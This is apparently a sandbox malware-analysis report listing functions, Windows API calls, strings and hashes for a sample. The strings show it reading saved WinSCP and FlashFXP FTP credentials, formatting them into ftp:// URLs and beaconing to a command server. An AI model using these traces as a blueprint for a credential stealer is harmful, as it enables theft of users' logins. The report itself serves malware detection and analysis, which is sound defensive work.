RegCloseKey.ADVAPI32(?), ref: 0040476D

Strings

SOFTWARE\martin prikryl\winscp 2\sessions, xrefs: 0040456A
username, xrefs: 004045A2
ftp://%s:%s@%s:%u, xrefs: 004046F3
hostname, xrefs: 00404586
password, xrefs: 004045B0
portnumber, xrefs: 00404594

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AllocCloseEnumHeapOpen
String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
API String ID: 3497950970-285550827
Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68

Function 00409C99 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127memorynetworkfileCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6

Strings

hOA, xrefs: 00409CC5

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Heap$Process$AllocInternet$FileFreeOpenRead
String ID: hOA
API String ID: 1355009786-3485425990
Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

Function 00406E69 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406E78

Strings

.html, xrefs: 00406F14
From: , xrefs: 00406F8E
Page generated at: , xrefs: 00407000
8@, xrefs: 00406ED2
0, xrefs: 00406EF5
hOA, xrefs: 00406E7E
Via: , xrefs: 00406FAF
^key=, xrefs: 00406F2E
^nocrypt, xrefs: 00406F5C

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CountTick
String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
API String ID: 536389180-1762329985
Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

Function 00409301 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
SysFreeString.OLEAUT32(?), ref: 00409359
SysFreeString.OLEAUT32(?), ref: 00409362
SysAllocString.OLEAUT32(?), ref: 004093B8
SysAllocString.OLEAUT32(javascript), ref: 004093C1
SysFreeString.OLEAUT32(00000000), ref: 004093E3
SysFreeString.OLEAUT32(00000000), ref: 004093E6

Strings

javascript, xrefs: 004093BA
+@, xrefs: 00409301
http:, xrefs: 00409347

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: String$Free$Alloc$CharLower
String ID: http:$javascript$+@
API String ID: 1987340527-3375436608
Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64

Function 00405229 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710), ref: 00405366
Sleep.KERNEL32(00009C40), ref: 00405383
Sleep.KERNEL32(00004E20), ref: 004053D0

Strings

CsM, xrefs: 004053B2
.html, xrefs: 004052B4
ftp, xrefs: 004052C5
hOA, xrefs: 00405305
From: , xrefs: 00405318
Via: , xrefs: 0040533C
^key=, xrefs: 004052D0
8@, xrefs: 00405275

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Sleep
String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
API String ID: 3472027048-1081452883
Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D

Function 00408CB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000016), ref: 00408E7A

Strings

http, xrefs: 00408E1A
_self, xrefs: 00408ED5
+@, xrefs: 00408CB7

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: ClearVariant
String ID: _self$http$+@
API String ID: 1473721057-3317424838
Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4

Function 00406ADF Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17

Strings

CLSID, xrefs: 00406B3B, 00406B40, 00406B9D, 00406BB5, 00406C28, 00406C40
SOFTWARE\Classes\MIME\Database\Content Type\, xrefs: 00406AF6, 00406B5D, 00406BE8
application/x-javascript, xrefs: 00406B68
text/javascript, xrefs: 00406BF3
text/html, xrefs: 00406B01

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
API String ID: 3546245721-1332223170
Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69

Function 0040A156 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
SetParent.USER32(00000000,00000000), ref: 0040A1E2
GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E

Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

Shell_TrayWnd, xrefs: 0040A1CF
eventConn, xrefs: 0040A188

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
String ID: Shell_TrayWnd$eventConn
API String ID: 2141107913-3455059086
Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96

Function 004047CC Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
StrStrIA.SHLWAPI(?,?), ref: 00404913
StrStrIA.SHLWAPI(?,?), ref: 00404925
StrStrIA.SHLWAPI(?,?), ref: 00404935
StrStrIA.SHLWAPI(?,?), ref: 00404947

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Strings

ftplist.txt, xrefs: 00404805
ftp://%S:%S@%S:%u, xrefs: 004049F6

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
String ID: ftp://%S:%S@%S:%u$ftplist.txt
API String ID: 1635188419-1322549247
Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A

Function 00407362 Relevance: 13.6, APIs: 9, Instructions: 114timesynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
GetLocalTime.KERNEL32(?), ref: 00407387
GetLocalTime.KERNEL32(?), ref: 0040738D
GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
String ID:
API String ID: 3166187867-0
Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69

Function 004089FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

http, xrefs: 00408B59
+@, xrefs: 004089FD

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID:
String ID: http$+@
API String ID: 0-4127549746
Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4

Function 00403740 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804

Strings

*flashfxp*, xrefs: 004037CE
#, xrefs: 004037DC
datafolder, xrefs: 0040376D
SOFTWARE\FlashFXP\3, xrefs: 0040375E
&, xrefs: 004037EA

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
API String ID: 1994525040-4055253781
Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69

Function 00409909 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004099EB
SysAllocString.OLEAUT32(?), ref: 004099F9

Strings

</url>, xrefs: 00409917
http://, xrefs: 00409941
</domain>, xrefs: 004099B8
<url>, xrefs: 0040991C
<domain>, xrefs: 004099BD

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AllocString
String ID: </domain>$</url>$<domain>$<url>$http://
API String ID: 2525500382-924421446
Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99

Function 00408F26 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
SysFreeString.OLEAUT32(0000000B), ref: 00409046

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08

Function 0040AC93 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
Sleep.KERNEL32(0000EA60), ref: 0040AD76
Sleep.KERNEL32(00002710), ref: 0040ADA4

Strings

d, xrefs: 0040ADB6
^rcn=1, xrefs: 0040AD37
0, xrefs: 0040AD12
job^rev=%s^os=%s, xrefs: 0040ACDB
hOA, xrefs: 0040ACC0

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Sleep$AttemptConnectInternet
String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
API String ID: 362191241-2593661552
Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B

Function 0040D790 Relevance: 10.8, APIs: 7, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0040D892
__FindPESection.LIBCMT ref: 0040D8AC

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D

Function 00408825 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004088E4
SysFreeString.OLEAUT32(?), ref: 004088E9
SysFreeString.OLEAUT32(?), ref: 004089D3
SysFreeString.OLEAUT32(?), ref: 004089D8
SysFreeString.OLEAUT32(?), ref: 004089F3

Strings

+@, xrefs: 0040884C

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: FreeString
String ID: +@
API String ID: 3341692771-3835504741
Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59

Function 0040A786 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 121sleepmemoryCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Strings

confirm^rev=%s^code=%s^param=%s^os=%s, xrefs: 0040A7BA
0, xrefs: 0040A848

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
